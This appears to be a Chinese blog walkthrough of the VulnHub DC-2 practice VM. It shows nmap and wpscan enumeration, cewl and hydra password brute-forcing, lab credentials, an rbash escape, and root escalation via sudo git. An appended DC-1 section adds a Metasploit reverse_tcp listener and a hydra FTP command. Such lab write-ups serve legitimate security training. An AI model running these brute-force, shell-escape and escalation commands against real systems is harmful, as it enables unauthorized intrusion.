vulnhub靶机渗透DC-2

靶机入侵——DC2

1、环境搭建

​ 下载地址:https://www.vulnhub.com/entry/dc-2,311/

​ 下载后用 VMware 或者 VirtualBox 打开,并配置好网卡,靶机与攻击机应置于同一网络下,靶机默认是桥接模式,能用攻击机连接到就行。这里使用主机模式。

2、信息收集

  • 主机发现

    使用nmap进行主机探测(-sP参数也可):nmap -sn 192.168.80.1/24

    在这里插入图片描述

    192.168.80.129 为靶机ip,也可以使用Kali中的arp-scan工具扫描:arp-scan 192.168.80.1/24

  • 端口扫描

    使用nmap扫描主机服务、端口情况(-p-等价于-p 1-65535):nmap -p- -A 192.168.80.129
    在这里插入图片描述

  • 本地修改host文件解析域名,访问web服务:192.168.31.182 dc-2

    windows系统该文件位置:“C:\Windows\System32\drivers\etc\hosts.ics”

    linux系统该文件位置:/etc/hosts

    修改后,成功访问网站并获得flag1

在这里插入图片描述

  • web端进一步信息收集

    在这里插入图片描述

    通过wappalyzer我们发现网站基本信息

3、漏洞探测与利用

  • 根据flag1的提示,我们知道可以通过爬取网站内容来生成字典,爆破后台,这里我们使用wpscan来提取用户名,wpscan是专门最对wordpress的扫描器,命令:wpscan --url dc-2 -e u

    在这里插入图片描述
    在这里插入图片描述

    获得admin、jerry、tom三个用户

  • cewl是一个网页关键字抓取工具。利用网站关键字作为密码继续进行爆破。命令:cewl dc-2 -w pds.txt
    在这里插入图片描述

  • 使用wpscan爆破:wpscan --url dc-2 -U user.txt -P pds.txt
    在这里插入图片描述

    得到两个用户名及密码:jerry/adipiscing 和 tom/parturient

  • 尝试登录后台,默认路径为 wp-admin (如果不是就得尝试爆破)
    在这里插入图片描述

    成功登录,找到flag2

  • 根据提示不能从WordPrss上面找到捷径,登陆tom也没有发现什么,这是时想到了还有7744端口,因为它是ssh协议所以直接尝试ssh连接。由于端口号不是22,所以需要用-p 7744指定端口号。

  • 使用hydra爆破,使用得到的三个用户名以及生成的密码
    hydra -L user.txt -P pds.txt ssh://192.168.80.129:7744 -vV -f -t 4
    在这里插入图片描述

  • 结够发现密码为web后台用户密码,在实际工作中爆破时可以首先尝试相关联账密后空口令。如果能登录将节省大量时间。
    在这里插入图片描述

  • ssh登录,账密:tom/parturient 或者 jerry/adipiscing
    在这里插入图片描述

  • 执行命令发现受到rbash环境的限制,需要绕过rbash限制。
    在这里插入图片描述

  • 使用以下方式绕过,参考链接https://blog.youkuaiyun.com/weixin_43705814/article/details/111879362

    	BASH_CMDS[a]=/bin/sh;a  注:把/bin/bash给a变量`
    	export PATH=$PATH:/bin/    注:将/bin 作为PATH环境变量导出
    	export PATH=$PATH:/usr/bin   注:将/usr/bin作为PATH环境变量导出
    

在这里插入图片描述

​ 执行命令绕过,并得到flag3

  • 根据提示,我们得从jerry账户找flag,移动到其家目录,发现了flag4.txt。
    在这里插入图片描述

  • 根据提示,我们需要想办法进行提权

4、权限提升

  • sudo -l #列出目前用户可执行与无法执行的指令
    在这里插入图片描述

  • 发现tom用户无法使用该命令,切换 jerry 用户:su jerry
    在这里插入图片描述

  • 切换后,我们发现。jerry可以使用root权限的git命,强制进入git交互模式,输入下列命令进行提权

    	sudo git help config
    		!/bin/bash或者!'sh'完成提权
    
    	sudo git  -p help
    		!/bin/bash
    
    

在这里插入图片描述

  • 成功提权至root权限,成功找到最后一个flag
    在这里插入图片描述
### VulnHub DC-1 靶机 攻略 介绍 下载 #### 关于DC-1靶机 VulnHub上的DC-1靶机旨在提供给安全爱好者和渗透测试学习者一个实践平台,在此环境中可以合法地进行各种攻击尝试,从而提升技能。该虚拟环境模拟了一个存在多个已知漏洞的服务网络应用,允许参与者通过一系列挑战来获取系统的控制权并最终找到隐藏的标志文件(flag)[^1]。 #### 获取与安装 为了开始体验DC-1靶机的任务,首先需要访问[VulnHub官方网站](https://www.vulnhub.com/)搜索栏输入“DC-1”,点击进入详情页面下载对应的镜像文件(OVA格式),之后按照提示导入到支持OVA标准的虚拟化工具如VirtualBox或VMware Workstation Pro中完成部署工作[^3]。 #### 初始配置建议 启动后的DC-1默认会分配一个私有IP地址(例如:`192.168.x.x`),此时应该确保Kali Linux作为攻击端能够与其在同一局域网内通信正常;可以通过ping命令验证连通性状况良好后再继续后续操作。 #### 基础信息搜集阶段 当确认双方设备间通讯无碍后便进入了实际演练环节——即从基础的信息收集做起。这一步骤通常涉及使用Nmap扫描开放端口和服务版本探测等手段以了解目标主机概况: ```bash nmap -A <target-ip> ``` 上述指令将会返回有关远程服务器运行状态的关键情报,为下一步制定针对性策略奠定坚实的基础。 #### 进阶探索与利用路径 随着对DC-1认识程度加深,接下来便是寻找潜在的安全缺陷加以利用的过程。根据已有经验分享可知,成功建立Meterpreter回话意味着已经突破了初步防线,获得了更深层次的操作权限: ```ruby use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost <local-ip> # Kali IP address exploit ``` 以上Metasploit框架下的设置可帮助快速搭建监听服务等待来自受害者的连接请求,一旦形成稳定的交互通道即可执行更多高级功能比如浏览目录结构直至定位至预设的目标文件位置。 #### 密码破解辅助技巧 考虑到可能存在弱密码保护的情况,采用Hydra这样的暴力猜解程序配合常用用户名列表以及大型词库资源不失为一种高效的方法去揭示真实的身份凭证组合关系[^4]: ```bash hydra -L /usr/share/wordlists/user.txt -P /usr/share/wordlists/rockyou.txt.gz ftp://<target-ip> ``` 这里展示了针对FTP协议实施登录认证绕过的实例,当然具体应用场景还需视实际情况灵活调整参数选项。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值